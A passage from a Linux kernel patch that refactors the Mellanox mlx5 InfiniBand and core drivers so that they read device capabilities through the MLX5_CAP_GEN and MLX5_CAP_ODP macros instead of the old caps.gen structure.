mlx5_wqe_data_seg); props->max_sge = min(max_rq_sg, max_sq_sg); - props->max_cq = 1 << gen->log_max_cq; - props->max_cqe = gen->max_cqes - 1; - props->max_mr = 1 << gen->log_max_mkey; - props->max_pd = 1 << gen->log_max_pd; - props->max_qp_rd_atom = 1 << gen->log_max_ra_req_qp; - props->max_qp_init_rd_atom = 1 << gen->log_max_ra_res_qp; - props->max_srq = 1 << gen->log_max_srq; - props->max_srq_wr = gen->max_srq_wqes - 1; - props->local_ca_ack_delay = gen->local_ca_ack_delay; + props->max_cq = 1 << MLX5_CAP_GEN(mdev, log_max_cq); + props->max_cqe = (1 << MLX5_CAP_GEN(mdev, 
log_max_eq_sz)) - 1; + props->max_mr = 1 << MLX5_CAP_GEN(mdev, log_max_mkey); + props->max_pd = 1 << MLX5_CAP_GEN(mdev, log_max_pd); + props->max_qp_rd_atom = 1 << MLX5_CAP_GEN(mdev, log_max_ra_req_qp); + props->max_qp_init_rd_atom = 1 << MLX5_CAP_GEN(mdev, log_max_ra_res_qp); + props->max_srq = 1 << MLX5_CAP_GEN(mdev, log_max_srq); + props->max_srq_wr = (1 << MLX5_CAP_GEN(mdev, log_max_srq_sz)) - 1; + props->local_ca_ack_delay = MLX5_CAP_GEN(mdev, local_ca_ack_delay); props->max_res_rd_atom = props->max_qp_rd_atom * props->max_qp; props->max_srq_sge = max_rq_sg - 1; props->max_fast_reg_page_list_len = (unsigned int)-1; - props->local_ca_ack_delay = gen->local_ca_ack_delay; props->atomic_cap = IB_ATOMIC_NONE; props->masked_atomic_cap = IB_ATOMIC_NONE; props->max_pkeys = be16_to_cpup((__be16 *)(out_mad->data + 28)); - props->max_mcast_grp = 1 << gen->log_max_mcg; - props->max_mcast_qp_attach = gen->max_qp_mcg; + props->max_mcast_grp = 1 << MLX5_CAP_GEN(mdev, log_max_mcg); + props->max_mcast_qp_attach = MLX5_CAP_GEN(mdev, max_qp_mcg); props->max_total_mcast_qp_attach = props->max_mcast_qp_attach * props->max_mcast_grp; props->max_map_per_fmr = INT_MAX; /* no limit in ConnectIB */ #ifdef CONFIG_INFINIBAND_ON_DEMAND_PAGING - if (dev->mdev->caps.gen.flags & MLX5_DEV_CAP_FLAG_ON_DMND_PG) + if (MLX5_CAP_GEN(mdev, pg)) props->device_cap_flags |= IB_DEVICE_ON_DEMAND_PAGING; props->odp_caps = dev->odp_caps; #endif @@ -172,14 +171,13 @@ int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, struct ib_port_attr *props) { struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; struct ib_smp *in_mad = NULL; struct ib_smp *out_mad = NULL; - struct mlx5_general_caps *gen; int ext_active_speed; int err = -ENOMEM; - gen = &dev->mdev->caps.gen; - if (port < 1 || port > gen->num_ports) { + if (port < 1 || port > MLX5_CAP_GEN(mdev, num_ports)) { mlx5_ib_warn(dev, "invalid port number %d\n", port); return -EINVAL; } @@ -210,8 +208,8 @@ int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, props->phys_state = out_mad->data[33] >> 4; props->port_cap_flags = be32_to_cpup((__be32 *)(out_mad->data + 20)); props->gid_tbl_len = out_mad->data[50]; - props->max_msg_sz = 1 << gen->log_max_msg; - props->pkey_tbl_len = gen->port[port - 1].pkey_table_len; + props->max_msg_sz = 1 << MLX5_CAP_GEN(mdev, log_max_msg); + props->pkey_tbl_len = mdev->port_caps[port - 1].pkey_table_len; props->bad_pkey_cntr = be16_to_cpup((__be16 *)(out_mad->data + 46)); props->qkey_viol_cntr = be16_to_cpup((__be16 *)(out_mad->data + 48)); props->active_width = out_mad->data[31] & 0xf; @@ -238,7 +236,7 @@ int mlx5_ib_query_port(struct ib_device *ibdev, u8 port, /* If reported active speed is QDR, check if is FDR-10 */ if (props->active_speed == 4) { - if (gen->ext_port_cap[port - 1] & + if (mdev->port_caps[port - 1].ext_port_cap & MLX_EXT_PORT_CAP_FLAG_EXTENDED_PORT_INFO) { init_query_mad(in_mad); in_mad->attr_id = MLX5_ATTR_EXTENDED_PORT_INFO; @@ -392,7 +390,6 @@ static struct ib_ucontext *mlx5_ib_alloc_ucontext(struct ib_device *ibdev, struct mlx5_ib_alloc_ucontext_req_v2 req; struct mlx5_ib_alloc_ucontext_resp resp; struct mlx5_ib_ucontext *context; - struct mlx5_general_caps *gen; struct mlx5_uuar_info *uuari; struct mlx5_uar *uars; int gross_uuars; @@ -403,7 +400,6 @@ static struct ib_ucontext *mlx5_ib_alloc_ucontext(struct ib_device *ibdev, int i; size_t reqlen; - gen = &dev->mdev->caps.gen; if (!dev->ib_active) return ERR_PTR(-EAGAIN); @@ -436,14 +432,14 @@ static struct ib_ucontext 
*mlx5_ib_alloc_ucontext(struct ib_device *ibdev, num_uars = req.total_num_uuars / MLX5_NON_FP_BF_REGS_PER_PAGE; gross_uuars = num_uars * MLX5_BF_REGS_PER_PAGE; - resp.qp_tab_size = 1 << gen->log_max_qp; - resp.bf_reg_size = gen->bf_reg_size; - resp.cache_line_size = L1_CACHE_BYTES; - resp.max_sq_desc_sz = gen->max_sq_desc_sz; - resp.max_rq_desc_sz = gen->max_rq_desc_sz; - resp.max_send_wqebb = gen->max_wqes; - resp.max_recv_wr = gen->max_wqes; - resp.max_srq_recv_wr = gen->max_srq_wqes; + resp.qp_tab_size = 1 << MLX5_CAP_GEN(dev->mdev, log_max_qp); + resp.bf_reg_size = 1 << MLX5_CAP_GEN(dev->mdev, log_bf_reg_size); + resp.cache_line_size = L1_CACHE_BYTES; + resp.max_sq_desc_sz = MLX5_CAP_GEN(dev->mdev, max_wqe_sz_sq); + resp.max_rq_desc_sz = MLX5_CAP_GEN(dev->mdev, max_wqe_sz_rq); + resp.max_send_wqebb = 1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz); + resp.max_recv_wr = 1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz); + resp.max_srq_recv_wr = 1 << MLX5_CAP_GEN(dev->mdev, log_max_srq_sz); context = kzalloc(sizeof(*context), GFP_KERNEL); if (!context) @@ -493,7 +489,7 @@ static struct ib_ucontext *mlx5_ib_alloc_ucontext(struct ib_device *ibdev, mutex_init(&context->db_page_mutex); resp.tot_uuars = req.total_num_uuars; - resp.num_ports = gen->num_ports; + resp.num_ports = MLX5_CAP_GEN(dev->mdev, num_ports); err = ib_copy_to_udata(udata, &resp, sizeof(resp) - sizeof(resp.reserved)); if (err) @@ -895,11 +891,9 @@ static void mlx5_ib_event(struct mlx5_core_dev *dev, void *context, static void get_ext_port_caps(struct mlx5_ib_dev *dev) { - struct mlx5_general_caps *gen; int port; - gen = &dev->mdev->caps.gen; - for (port = 1; port <= gen->num_ports; port++) + for (port = 1; port <= MLX5_CAP_GEN(dev->mdev, num_ports); port++) mlx5_query_ext_port_caps(dev, port); } @@ -907,11 +901,9 @@ static int get_port_caps(struct mlx5_ib_dev *dev) { struct ib_device_attr *dprops = NULL; struct ib_port_attr *pprops = NULL; - struct mlx5_general_caps *gen; int err = -ENOMEM; int port; - gen = &dev->mdev->caps.gen; pprops = kmalloc(sizeof(*pprops), GFP_KERNEL); if (!pprops) goto out; @@ -926,14 +918,17 @@ static int get_port_caps(struct mlx5_ib_dev *dev) goto out; } - for (port = 1; port <= gen->num_ports; port++) { + for (port = 1; port <= MLX5_CAP_GEN(dev->mdev, num_ports); port++) { err = mlx5_ib_query_port(&dev->ib_dev, port, pprops); if (err) { - mlx5_ib_warn(dev, "query_port %d failed %d\n", port, err); + mlx5_ib_warn(dev, "query_port %d failed %d\n", + port, err); break; } - gen->port[port - 1].pkey_table_len = dprops->max_pkeys; - gen->port[port - 1].gid_table_len = pprops->gid_tbl_len; + dev->mdev->port_caps[port - 1].pkey_table_len = + dprops->max_pkeys; + dev->mdev->port_caps[port - 1].gid_table_len = + pprops->gid_tbl_len; mlx5_ib_dbg(dev, "pkey_table_len %d, gid_table_len %d\n", dprops->max_pkeys, pprops->gid_tbl_len); } @@ -1207,8 +1202,8 @@ static void *mlx5_ib_add(struct mlx5_core_dev *mdev) strlcpy(dev->ib_dev.name, "mlx5_%d", IB_DEVICE_NAME_MAX); dev->ib_dev.owner = THIS_MODULE; dev->ib_dev.node_type = RDMA_NODE_IB_CA; - dev->ib_dev.local_dma_lkey = mdev->caps.gen.reserved_lkey; - dev->num_ports = mdev->caps.gen.num_ports; + dev->ib_dev.local_dma_lkey = 0 /* not supported for now */; + dev->num_ports = MLX5_CAP_GEN(mdev, num_ports); dev->ib_dev.phys_port_cnt = dev->num_ports; dev->ib_dev.num_comp_vectors = dev->mdev->priv.eq_table.num_comp_vectors; @@ -1286,9 +1281,9 @@ static void *mlx5_ib_add(struct mlx5_core_dev *mdev) dev->ib_dev.free_fast_reg_page_list = mlx5_ib_free_fast_reg_page_list; 
dev->ib_dev.check_mr_status = mlx5_ib_check_mr_status; - mlx5_ib_internal_query_odp_caps(dev); + mlx5_ib_internal_fill_odp_caps(dev); - if (mdev->caps.gen.flags & MLX5_DEV_CAP_FLAG_XRC) { + if (MLX5_CAP_GEN(mdev, xrc)) { dev->ib_dev.alloc_xrcd = mlx5_ib_alloc_xrcd; dev->ib_dev.dealloc_xrcd = mlx5_ib_dealloc_xrcd; dev->ib_dev.uverbs_cmd_mask |= diff --git a/drivers/infiniband/hw/mlx5/mlx5_ib.h b/drivers/infiniband/hw/mlx5/mlx5_ib.h index dff1cfcdf476..0c441add0464 100644 --- a/drivers/infiniband/hw/mlx5/mlx5_ib.h +++ b/drivers/infiniband/hw/mlx5/mlx5_ib.h @@ -617,7 +617,7 @@ int mlx5_ib_check_mr_status(struct ib_mr *ibmr, u32 check_mask, #ifdef CONFIG_INFINIBAND_ON_DEMAND_PAGING extern struct workqueue_struct *mlx5_ib_page_fault_wq; -int mlx5_ib_internal_query_odp_caps(struct mlx5_ib_dev *dev); +void mlx5_ib_internal_fill_odp_caps(struct mlx5_ib_dev *dev); void mlx5_ib_mr_pfault_handler(struct mlx5_ib_qp *qp, struct mlx5_ib_pfault *pfault); void mlx5_ib_odp_create_qp(struct mlx5_ib_qp *qp); @@ -631,9 +631,9 @@ void mlx5_ib_invalidate_range(struct ib_umem *umem, unsigned long start, unsigned long end); #else /* CONFIG_INFINIBAND_ON_DEMAND_PAGING */ -static inline int mlx5_ib_internal_query_odp_caps(struct mlx5_ib_dev *dev) +static inline void mlx5_ib_internal_fill_odp_caps(struct mlx5_ib_dev *dev) { - return 0; + return; } static inline void mlx5_ib_odp_create_qp(struct mlx5_ib_qp *qp) {} diff --git a/drivers/infiniband/hw/mlx5/mr.c b/drivers/infiniband/hw/mlx5/mr.c index 71c593583864..bc9a0de897cb 100644 --- a/drivers/infiniband/hw/mlx5/mr.c +++ b/drivers/infiniband/hw/mlx5/mr.c @@ -975,8 +975,7 @@ static struct mlx5_ib_mr *reg_create(struct ib_pd *pd, u64 virt_addr, struct mlx5_ib_mr *mr; int inlen; int err; - bool pg_cap = !!(dev->mdev->caps.gen.flags & - MLX5_DEV_CAP_FLAG_ON_DMND_PG); + bool pg_cap = !!(MLX5_CAP_GEN(dev->mdev, pg)); mr = kzalloc(sizeof(*mr), GFP_KERNEL); if (!mr) diff --git a/drivers/infiniband/hw/mlx5/odp.c b/drivers/infiniband/hw/mlx5/odp.c index 5099db08afd2..aa8391e75385 100644 --- a/drivers/infiniband/hw/mlx5/odp.c +++ b/drivers/infiniband/hw/mlx5/odp.c @@ -109,40 +109,33 @@ void mlx5_ib_invalidate_range(struct ib_umem *umem, unsigned long start, ib_umem_odp_unmap_dma_pages(umem, start, end); } -#define COPY_ODP_BIT_MLX_TO_IB(reg, ib_caps, field_name, bit_name) do { \ - if (be32_to_cpu(reg.field_name) & MLX5_ODP_SUPPORT_##bit_name) \ - ib_caps->field_name |= IB_ODP_SUPPORT_##bit_name; \ -} while (0) - -int mlx5_ib_internal_query_odp_caps(struct mlx5_ib_dev *dev) +void mlx5_ib_internal_fill_odp_caps(struct mlx5_ib_dev *dev) { - int err; - struct mlx5_odp_caps hw_caps; struct ib_odp_caps *caps = &dev->odp_caps; memset(caps, 0, sizeof(*caps)); - if (!(dev->mdev->caps.gen.flags & MLX5_DEV_CAP_FLAG_ON_DMND_PG)) - return 0; - - err = mlx5_query_odp_caps(dev->mdev, &hw_caps); - if (err) - goto out; + if (!MLX5_CAP_GEN(dev->mdev, pg)) + return; caps->general_caps = IB_ODP_SUPPORT; - COPY_ODP_BIT_MLX_TO_IB(hw_caps, caps, per_transport_caps.ud_odp_caps, - SEND); - COPY_ODP_BIT_MLX_TO_IB(hw_caps, caps, per_transport_caps.rc_odp_caps, - SEND); - COPY_ODP_BIT_MLX_TO_IB(hw_caps, caps, per_transport_caps.rc_odp_caps, - RECV); - COPY_ODP_BIT_MLX_TO_IB(hw_caps, caps, per_transport_caps.rc_odp_caps, - WRITE); - COPY_ODP_BIT_MLX_TO_IB(hw_caps, caps, per_transport_caps.rc_odp_caps, - READ); - -out: - return err; + + if (MLX5_CAP_ODP(dev->mdev, ud_odp_caps.send)) + caps->per_transport_caps.ud_odp_caps |= IB_ODP_SUPPORT_SEND; + + if (MLX5_CAP_ODP(dev->mdev, rc_odp_caps.send)) + 
caps->per_transport_caps.rc_odp_caps |= IB_ODP_SUPPORT_SEND; + + if (MLX5_CAP_ODP(dev->mdev, rc_odp_caps.receive)) + caps->per_transport_caps.rc_odp_caps |= IB_ODP_SUPPORT_RECV; + + if (MLX5_CAP_ODP(dev->mdev, rc_odp_caps.write)) + caps->per_transport_caps.rc_odp_caps |= IB_ODP_SUPPORT_WRITE; + + if (MLX5_CAP_ODP(dev->mdev, rc_odp_caps.read)) + caps->per_transport_caps.rc_odp_caps |= IB_ODP_SUPPORT_READ; + + return; } static struct mlx5_ib_mr *mlx5_ib_odp_find_mr_lkey(struct mlx5_ib_dev *dev, diff --git a/drivers/infiniband/hw/mlx5/qp.c b/drivers/infiniband/hw/mlx5/qp.c index 426eb88dfa49..15fd485d1ad9 100644 --- a/drivers/infiniband/hw/mlx5/qp.c +++ b/drivers/infiniband/hw/mlx5/qp.c @@ -220,13 +220,11 @@ static void mlx5_ib_qp_event(struct mlx5_core_qp *qp, int type) static int set_rq_size(struct mlx5_ib_dev *dev, struct ib_qp_cap *cap, int has_rq, struct mlx5_ib_qp *qp, struct mlx5_ib_create_qp *ucmd) { - struct mlx5_general_caps *gen; int wqe_size; int wq_size; - gen = &dev->mdev->caps.gen; /* Sanity check RQ size before proceeding */ - if (cap->max_recv_wr > gen->max_wqes) + if (cap->max_recv_wr > (1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz))) return -EINVAL; if (!has_rq) { @@ -246,10 +244,11 @@ static int set_rq_size(struct mlx5_ib_dev *dev, struct ib_qp_cap *cap, wq_size = roundup_pow_of_two(cap->max_recv_wr) * wqe_size; wq_size = max_t(int, wq_size, MLX5_SEND_WQE_BB); qp->rq.wqe_cnt = wq_size / wqe_size; - if (wqe_size > gen->max_rq_desc_sz) { + if (wqe_size > MLX5_CAP_GEN(dev->mdev, max_wqe_sz_rq)) { mlx5_ib_dbg(dev, "wqe_size %d, max %d\n", wqe_size, - gen->max_rq_desc_sz); + MLX5_CAP_GEN(dev->mdev, + max_wqe_sz_rq)); return -EINVAL; } qp->rq.wqe_shift = ilog2(wqe_size); @@ -330,11 +329,9 @@ static int calc_send_wqe(struct ib_qp_init_attr *attr) static int calc_sq_size(struct mlx5_ib_dev *dev, struct ib_qp_init_attr *attr, struct mlx5_ib_qp *qp) { - struct mlx5_general_caps *gen; int wqe_size; int wq_size; - gen = &dev->mdev->caps.gen; if (!attr->cap.max_send_wr) return 0; @@ -343,9 +340,9 @@ static int calc_sq_size(struct mlx5_ib_dev *dev, struct ib_qp_init_attr *attr, if (wqe_size < 0) return wqe_size; - if (wqe_size > gen->max_sq_desc_sz) { + if (wqe_size > MLX5_CAP_GEN(dev->mdev, max_wqe_sz_sq)) { mlx5_ib_dbg(dev, "wqe_size(%d) > max_sq_desc_sz(%d)\n", - wqe_size, gen->max_sq_desc_sz); + wqe_size, MLX5_CAP_GEN(dev->mdev, max_wqe_sz_sq)); return -EINVAL; } @@ -358,9 +355,10 @@ static int calc_sq_size(struct mlx5_ib_dev *dev, struct ib_qp_init_attr *attr, wq_size = roundup_pow_of_two(attr->cap.max_send_wr * wqe_size); qp->sq.wqe_cnt = wq_size / MLX5_SEND_WQE_BB; - if (qp->sq.wqe_cnt > gen->max_wqes) { + if (qp->sq.wqe_cnt > (1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz))) { mlx5_ib_dbg(dev, "wqe count(%d) exceeds limits(%d)\n", - qp->sq.wqe_cnt, gen->max_wqes); + qp->sq.wqe_cnt, + 1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz)); return -ENOMEM; } qp->sq.wqe_shift = ilog2(MLX5_SEND_WQE_BB); @@ -375,13 +373,11 @@ static int set_user_buf_size(struct mlx5_ib_dev *dev, struct mlx5_ib_qp *qp, struct mlx5_ib_create_qp *ucmd) { - struct mlx5_general_caps *gen; int desc_sz = 1 << qp->sq.wqe_shift; - gen = &dev->mdev->caps.gen; - if (desc_sz > gen->max_sq_desc_sz) { + if (desc_sz > MLX5_CAP_GEN(dev->mdev, max_wqe_sz_sq)) { mlx5_ib_warn(dev, "desc_sz %d, max_sq_desc_sz %d\n", - desc_sz, gen->max_sq_desc_sz); + desc_sz, MLX5_CAP_GEN(dev->mdev, max_wqe_sz_sq)); return -EINVAL; } @@ -393,9 +389,10 @@ static int set_user_buf_size(struct mlx5_ib_dev *dev, qp->sq.wqe_cnt = ucmd->sq_wqe_count; - if 
(qp->sq.wqe_cnt > gen->max_wqes) { + if (qp->sq.wqe_cnt > (1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz))) { mlx5_ib_warn(dev, "wqe_cnt %d, max_wqes %d\n", - qp->sq.wqe_cnt, gen->max_wqes); + qp->sq.wqe_cnt, + 1 << MLX5_CAP_GEN(dev->mdev, log_max_qp_sz)); return -EINVAL; } @@ -866,22 +863,21 @@ static int create_qp_common(struct mlx5_ib_dev *dev, struct ib_pd *pd, struct ib_udata *udata, struct mlx5_ib_qp *qp) { struct mlx5_ib_resources *devr = &dev->devr; + struct mlx5_core_dev *mdev = dev->mdev; struct mlx5_ib_create_qp_resp resp; struct mlx5_create_qp_mbox_in *in; - struct mlx5_general_caps *gen; struct mlx5_ib_create_qp ucmd; int inlen = sizeof(*in); int err; mlx5_ib_odp_create_qp(qp); - gen = &dev->mdev->caps.gen; mutex_init(&qp->mutex); spin_lock_init(&qp->sq.lock); spin_lock_init(&qp->rq.lock); if (init_attr->create_flags & IB_QP_CREATE_BLOCK_MULTICAST_LOOPBACK) { - if (!(gen->flags & MLX5_DEV_CAP_FLAG_BLOCK_MCAST)) { + if (!MLX5_CAP_GEN(mdev, block_lb_mc)) { mlx5_ib_dbg(dev, "block multicast loopback isn't supported\n"); return -EINVAL; } else { @@ -914,15 +910,17 @@ static int create_qp_common(struct mlx5_ib_dev *dev, struct ib_pd *pd, if (pd) { if (pd->uobject) { + __u32 max_wqes = + 1 << MLX5_CAP_GEN(mdev, log_max_qp_sz); mlx5_ib_dbg(dev, "requested sq_wqe_count (%d)\n", ucmd.sq_wqe_count); if (ucmd.rq_wqe_shift != qp->rq.wqe_shift || ucmd.rq_wqe_count != qp->rq.wqe_cnt) { mlx5_ib_dbg(dev, "invalid rq params\n"); return -EINVAL; } - if (ucmd.sq_wqe_count > gen->max_wqes) { + if (ucmd.sq_wqe_count > max_wqes) { mlx5_ib_dbg(dev, "requested sq_wqe_count (%d) > max allowed (%d)\n", - ucmd.sq_wqe_count, gen->max_wqes); + ucmd.sq_wqe_count, max_wqes); return -EINVAL; } err = create_user_qp(dev, pd, qp, udata, &in, &resp, &inlen); @@ -1226,7 +1224,6 @@ struct ib_qp *mlx5_ib_create_qp(struct ib_pd *pd, struct ib_qp_init_attr *init_attr, struct ib_udata *udata) { - struct mlx5_general_caps *gen; struct mlx5_ib_dev *dev; struct mlx5_ib_qp *qp; u16 xrcdn = 0; @@ -1244,12 +1241,11 @@ struct ib_qp *mlx5_ib_create_qp(struct ib_pd *pd, } dev = to_mdev(to_mxrcd(init_attr->xrcd)->ibxrcd.device); } - gen = &dev->mdev->caps.gen; switch (init_attr->qp_type) { case IB_QPT_XRC_TGT: case IB_QPT_XRC_INI: - if (!(gen->flags & MLX5_DEV_CAP_FLAG_XRC)) { + if (!MLX5_CAP_GEN(dev->mdev, xrc)) { mlx5_ib_dbg(dev, "XRC not supported\n"); return ERR_PTR(-ENOSYS); } @@ -1356,9 +1352,6 @@ enum { static int ib_rate_to_mlx5(struct mlx5_ib_dev *dev, u8 rate) { - struct mlx5_general_caps *gen; - - gen = &dev->mdev->caps.gen; if (rate == IB_RATE_PORT_CURRENT) { return 0; } else if (rate < IB_RATE_2_5_GBPS || rate > IB_RATE_300_GBPS) { @@ -1366,7 +1359,7 @@ static int ib_rate_to_mlx5(struct mlx5_ib_dev *dev, u8 rate) } else { while (rate != IB_RATE_2_5_GBPS && !(1 << (rate + MLX5_STAT_RATE_OFFSET) & - gen->stat_rate_support)) + MLX5_CAP_GEN(dev->mdev, stat_rate_support))) --rate; } @@ -1377,10 +1370,8 @@ static int mlx5_set_path(struct mlx5_ib_dev *dev, const struct ib_ah_attr *ah, struct mlx5_qp_path *path, u8 port, int attr_mask, u32 path_flags, const struct ib_qp_attr *attr) { - struct mlx5_general_caps *gen; int err; - gen = &dev->mdev->caps.gen; path->fl = (path_flags & MLX5_PATH_FLAG_FL) ? 0x80 : 0; path->free_ar = (path_flags & MLX5_PATH_FLAG_FREE_AR) ? 
0x80 : 0; @@ -1391,9 +1382,11 @@ static int mlx5_set_path(struct mlx5_ib_dev *dev, const struct ib_ah_attr *ah, path->rlid = cpu_to_be16(ah->dlid); if (ah->ah_flags & IB_AH_GRH) { - if (ah->grh.sgid_index >= gen->port[port - 1].gid_table_len) { + if (ah->grh.sgid_index >= + dev->mdev->port_caps[port - 1].gid_table_len) { pr_err("sgid_index (%u) too large. max is %d\n", - ah->grh.sgid_index, gen->port[port - 1].gid_table_len); + ah->grh.sgid_index, + dev->mdev->port_caps[port - 1].gid_table_len); return -EINVAL; } path->grh_mlid |= 1 << 7; @@ -1570,7 +1563,6 @@ static int __mlx5_ib_modify_qp(struct ib_qp *ibqp, struct mlx5_ib_qp *qp = to_mqp(ibqp); struct mlx5_ib_cq *send_cq, *recv_cq; struct mlx5_qp_context *context; - struct mlx5_general_caps *gen; struct mlx5_modify_qp_mbox_in *in; struct mlx5_ib_pd *pd; enum mlx5_qp_state mlx5_cur, mlx5_new; @@ -1579,7 +1571,6 @@ static int __mlx5_ib_modify_qp(struct ib_qp *ibqp, int mlx5_st; int err; - gen = &dev->mdev->caps.gen; in = kzalloc(sizeof(*in), GFP_KERNEL); if (!in) return -ENOMEM; @@ -1619,7 +1610,8 @@ static int __mlx5_ib_modify_qp(struct ib_qp *ibqp, err = -EINVAL; goto out; } - context->mtu_msgmax = (attr->path_mtu << 5) | gen->log_max_msg; + context->mtu_msgmax = (attr->path_mtu << 5) | + (u8)MLX5_CAP_GEN(dev->mdev, log_max_msg); } if (attr_mask & IB_QP_DEST_QPN) @@ -1777,11 +1769,9 @@ int mlx5_ib_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr, struct mlx5_ib_dev *dev = to_mdev(ibqp->device); struct mlx5_ib_qp *qp = to_mqp(ibqp); enum ib_qp_state cur_state, new_state; - struct mlx5_general_caps *gen; int err = -EINVAL; int port; - gen = &dev->mdev->caps.gen; mutex_lock(&qp->mutex); cur_state = attr_mask & IB_QP_CUR_STATE ? attr->cur_qp_state : qp->state; @@ -1793,21 +1783,25 @@ int mlx5_ib_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr, goto out; if ((attr_mask & IB_QP_PORT) && - (attr->port_num == 0 || attr->port_num > gen->num_ports)) + (attr->port_num == 0 || + attr->port_num > MLX5_CAP_GEN(dev->mdev, num_ports))) goto out; if (attr_mask & IB_QP_PKEY_INDEX) { port = attr_mask & IB_QP_PORT ? 
attr->port_num : qp->port; - if (attr->pkey_index >= gen->port[port - 1].pkey_table_len) + if (attr->pkey_index >= + dev->mdev->port_caps[port - 1].pkey_table_len) goto out; } if (attr_mask & IB_QP_MAX_QP_RD_ATOMIC && - attr->max_rd_atomic > (1 << gen->log_max_ra_res_qp)) + attr->max_rd_atomic > + (1 << MLX5_CAP_GEN(dev->mdev, log_max_ra_res_qp))) goto out; if (attr_mask & IB_QP_MAX_DEST_RD_ATOMIC && - attr->max_dest_rd_atomic > (1 << gen->log_max_ra_req_qp)) + attr->max_dest_rd_atomic > + (1 << MLX5_CAP_GEN(dev->mdev, log_max_ra_req_qp))) goto out; if (cur_state == new_state && cur_state == IB_QPS_RESET) { @@ -3009,7 +3003,7 @@ static void to_ib_ah_attr(struct mlx5_ib_dev *ibdev, struct ib_ah_attr *ib_ah_at ib_ah_attr->port_num = path->port; if (ib_ah_attr->port_num == 0 || - ib_ah_attr->port_num > dev->caps.gen.num_ports) + ib_ah_attr->port_num > MLX5_CAP_GEN(dev, num_ports)) return; ib_ah_attr->sl = path->sl & 0xf; @@ -3135,12 +3129,10 @@ struct ib_xrcd *mlx5_ib_alloc_xrcd(struct ib_device *ibdev, struct ib_udata *udata) { struct mlx5_ib_dev *dev = to_mdev(ibdev); - struct mlx5_general_caps *gen; struct mlx5_ib_xrcd *xrcd; int err; - gen = &dev->mdev->caps.gen; - if (!(gen->flags & MLX5_DEV_CAP_FLAG_XRC)) + if (!MLX5_CAP_GEN(dev->mdev, xrc)) return ERR_PTR(-ENOSYS); xrcd = kmalloc(sizeof(*xrcd), GFP_KERNEL); diff --git a/drivers/infiniband/hw/mlx5/srq.c b/drivers/infiniband/hw/mlx5/srq.c index 4242e1ded868..e8e8e942fa4a 100644 --- a/drivers/infiniband/hw/mlx5/srq.c +++ b/drivers/infiniband/hw/mlx5/srq.c @@ -236,7 +236,6 @@ struct ib_srq *mlx5_ib_create_srq(struct ib_pd *pd, struct ib_udata *udata) { struct mlx5_ib_dev *dev = to_mdev(pd->device); - struct mlx5_general_caps *gen; struct mlx5_ib_srq *srq; int desc_size; int buf_size; @@ -245,13 +244,13 @@ struct ib_srq *mlx5_ib_create_srq(struct ib_pd *pd, int uninitialized_var(inlen); int is_xrc; u32 flgs, xrcdn; + __u32 max_srq_wqes = 1 << MLX5_CAP_GEN(dev->mdev, log_max_srq_sz); - gen = &dev->mdev->caps.gen; /* Sanity check SRQ size before proceeding */ - if (init_attr->attr.max_wr >= gen->max_srq_wqes) { + if (init_attr->attr.max_wr >= max_srq_wqes) { mlx5_ib_dbg(dev, "max_wr %d, cap %d\n", init_attr->attr.max_wr, - gen->max_srq_wqes); + max_srq_wqes); return ERR_PTR(-EINVAL); } diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eq.c b/drivers/net/ethernet/mellanox/mlx5/core/eq.c index 516efc25fc4f..a40b96d4c662 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/eq.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/eq.c @@ -455,7 +455,7 @@ int mlx5_start_eqs(struct mlx5_core_dev *dev) u32 async_event_mask = MLX5_ASYNC_EVENT_MASK; int err; - if (dev->caps.gen.flags & MLX5_DEV_CAP_FLAG_ON_DMND_PG) + if (MLX5_CAP_GEN(dev, pg)) async_event_mask |= (1ull << MLX5_EVENT_TYPE_PAGE_FAULT); err = mlx5_create_map_eq(dev, &table->cmd_eq, MLX5_EQ_VEC_CMD, @@ -478,7 +478,7 @@ int mlx5_start_eqs(struct mlx5_core_dev *dev) err = mlx5_create_map_eq(dev, &table->pages_eq, MLX5_EQ_VEC_PAGES, - dev->caps.gen.max_vf + 1, + /* TODO: sriov max_vf + */ 1, 1 << MLX5_EVENT_TYPE_PAGE_REQUEST, "mlx5_pages_eq", &dev->priv.uuari.uars[0]); if (err) { diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fw.c b/drivers/net/ethernet/mellanox/mlx5/core/fw.c index ef9b7695decd..801ccadd709a 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/fw.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/fw.c @@ -64,50 +64,74 @@ int mlx5_cmd_query_adapter(struct mlx5_core_dev *dev) return err; } -int mlx5_cmd_query_hca_cap(struct mlx5_core_dev *dev, struct mlx5_caps *caps) +int 
mlx5_query_hca_caps(struct mlx5_core_dev *dev) { - return mlx5_core_get_caps(dev, caps, HCA_CAP_OPMOD_GET_CUR); -} - -int mlx5_query_odp_caps(struct mlx5_core_dev *dev, struct mlx5_odp_caps *caps) -{ - u8 in[MLX5_ST_SZ_BYTES(query_hca_cap_in)]; - int out_sz = MLX5_ST_SZ_BYTES(query_hca_cap_out); - void *out; int err; - if (!(dev->caps.gen.flags & MLX5_DEV_CAP_FLAG_ON_DMND_PG)) - return -ENOTSUPP; + err = mlx5_core_get_caps(dev, MLX5_CAP_GENERAL, HCA_CAP_OPMOD_GET_CUR); + if (err) + return err; - memset(in, 0, sizeof(in)); - out = kzalloc(out_sz, GFP_KERNEL); - if (!out) - return -ENOMEM; - MLX5_SET(query_hca_cap_in, in, opcode, MLX5_CMD_OP_QUERY_HCA_CAP); - MLX5_SET(query_hca_cap_in, in, op_mod, HCA_CAP_OPMOD_GET_ODP_CUR); - err = mlx5_cmd_exec(dev, in, sizeof(in), out, out_sz); + err = mlx5_core_get_caps(dev, MLX5_CAP_GENERAL, HCA_CAP_OPMOD_GET_MAX); if (err) - goto out; + return err; - err = mlx5_cmd_status_to_err_v2(out); - if (err) { - mlx5_core_warn(dev, "query 